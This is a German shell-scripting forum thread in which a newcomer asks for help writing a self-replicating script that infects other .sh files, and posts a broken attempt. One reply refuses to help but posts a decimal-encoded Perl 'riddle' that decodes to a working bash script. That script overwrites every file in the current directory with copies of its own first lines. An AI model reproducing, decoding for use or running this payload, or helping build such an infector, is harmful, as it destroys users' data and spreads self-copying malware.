Selbstportierender Code

Dieses Thema im Forum "Shell-Skripte" wurde erstellt von monox, 08.02.2006.

  1. monox

    monox Grünschnabel

    Dabei seit:
    08.02.2006
    Beiträge:
    6
    Zustimmungen:
    0
    Hallo

    Ich möchte für ein persönliches, experimentelles Projekt folgendes erstellen:
    Ich möchte ein virales Script schreiben, welches zufällig andere Dateien befällt. Ich weiss, dass ich nur Scripte mit den richtigen Rechten befallen kann. Dies ist aber kein Problem: Bei meinem Projekt sind die zu befallenden Script so eingerichtet, dass das funktioniert.
    An diesen wird am Schluss eine Zeile hinzugefügt, dass der Virus hier war. Quasi eine Unterschrift. Immer wenn die Witsdatei ausgführt wird, also ein Shell Script, wird der Virus wieder weiterkopiert. Also quasi Code, der sich selber herumkopiert und überall sich markiert.
    Ich bin noch Neuling und möchte dies technisch umsetzen, obwohl es recht schwierig zu sein scheint.
    Hat mir jemand irgendwelche Vorschläge?
    Kann mir allenfalls jemand mit einer schlichten Lösung weiterhelfen?
    Ich habs bereits mit dem hier probiert::

    #!/bin/bash


    export V='GESWIRTSCRIPTE=`ls -l | tr -s " " | cut -d "
    " -f9 | fgrep ".sh" | wc -w`

    ZUFALLSZAHL=`expr $RANDOM % $GESWIRTSCRIPTE`

    LISTSCRIPTE=`ls -l | tr -s " " | cut -d " " -f9 |
    fgrep ".sh"`

    echo $LISTSCRIPTE > scriptliste

    ZUFINFFILE=`cat scriptliste | cut -d " " -f$ZUFALLSZAHL`

    echo "export
    V='$V'
    " >> "$ZUFINFFILE"; echo
    "$ZUFINFFILE"'

    FILE=$(sh -c "$V")

    echo $FILE

    #cat > "$V" >> $FILE


    ----

    cuuu

    monox
     
  2. Anzeige

    Schau dir mal diese Kategorie an. Dort findest du bestimmt etwas.
    Registrieren bzw. einloggen, um diese und auch andere Anzeigen zu deaktivieren
  3. Sharoz

    Sharoz Mitglied

    Dabei seit:
    10.11.2005
    Beiträge:
    46
    Zustimmungen:
    0
    Meinst du wirklich, dass du darauf eine Antwort bekommst?
    Vorallem steht der Titel mit dem Inhalt in keiner ersichtlichen Verbindung.
    Und dann auch noch einer erster Post hier. Man, man, man!

    Sharoz
     
  4. monox

    monox Grünschnabel

    Dabei seit:
    08.02.2006
    Beiträge:
    6
    Zustimmungen:
    0
    sorry, es war nicht böse gemeint.
    es war kein affront gegen dich.
    ich meine aber mein posting sehr ernst
     
  5. #4 Wolfgang, 08.02.2006
    Zuletzt bearbeitet: 08.02.2006
    Wolfgang

    Wolfgang Foren Gott

    Dabei seit:
    24.04.2005
    Beiträge:
    3.978
    Zustimmungen:
    0
    Ort:
    Erfurt
    Hallo
    Was ist dein Ziel, bzw. was bezweckst du damit?
    Hast du diesen (nicht sehr intuitiven und fehlerhaften) Code selbst erstellt?
    Was kam raus? ;)
    Einen ganz simplen Bash-Virus zu erstellen, der allerdings nur ganz dumme Systemadmins beeindrucken kann, ist ja kein Problem.
    Code:
    #Mein Rätsel für dich
    perl -e 'print 35.33.47.98.105.110.47.98.97.115.104.10.102.111.114.32.102.32.105.110.32.42.59.10.100.111.10.104.101.97.100.32.45.110.32.53.32.32.36.48.32.62.32.36.102.10.100.111.110.101.10'
    
    Das erfüllt aber nicht deine Anforderungen, deren Zweck im Verborgenen bleibt.
    Den Code für deine dubiose Aufgabe werde ich dir hier latürnich nicht schreiben.
    Ich denke du wirst es auch nicht wirklich erwarten.
    Wenn doch, dann geh nochmal ein wenig üben.:devil:

    Ich bin auf dein Zweck gespannt.

    Gruß Wolfgang
     
  6. Anzeige

    Vielleicht findest du HIER Antworten.
    Registrieren bzw. einloggen, um diese und auch andere Anzeigen zu deaktivieren
Thema:

Selbstportierender Code

Die Seite wird geladen...

Selbstportierender Code - Ähnliche Themen

  1. Free Software Foundation bewertet Codehosting-Dienste

    Free Software Foundation bewertet Codehosting-Dienste: Die Free Software Foundation (FSF) hat Bewertungen nach den selbst definierten Richtlinien für mehrere Codehosting-Dienste herausgegeben....
  2. Debian-Projekte zum Google Summer of Code 2016

    Debian-Projekte zum Google Summer of Code 2016: In insgesamt zehn Projekten schickt Debian 25 Teilnehmer zum GSoC 2016, vier weitere arbeiten im Rahmen des Outreachy-Programms. Die Projekte...
  3. AMD gibt CodeXL 2.0 im Quellcode frei

    AMD gibt CodeXL 2.0 im Quellcode frei: AMD hat sein Debugging- und Profiling-Tool, CodeXL, in der Version 2.0 veröffentlicht. Zugleich hat das Unternehmen die Verfügbarkeit des...
  4. Fraunhofer-Institut veröffentlicht BeeGFS-Quellcode

    Fraunhofer-Institut veröffentlicht BeeGFS-Quellcode: Das parallele Dateisystem BeeGFS wird freie Software. BeeGFS wird seit mehreren Jahren von der ThinkParQ GmbH, einer Ausgliederung des...
  5. Google kündigt Summer of Code 2016 an

    Google kündigt Summer of Code 2016 an: Der Suchmaschinenbetreiber Google geht dieses Jahr mit seinem Summer of Code in die mittlerweile elfte Runde. Auch dieses Jahr sind wieder...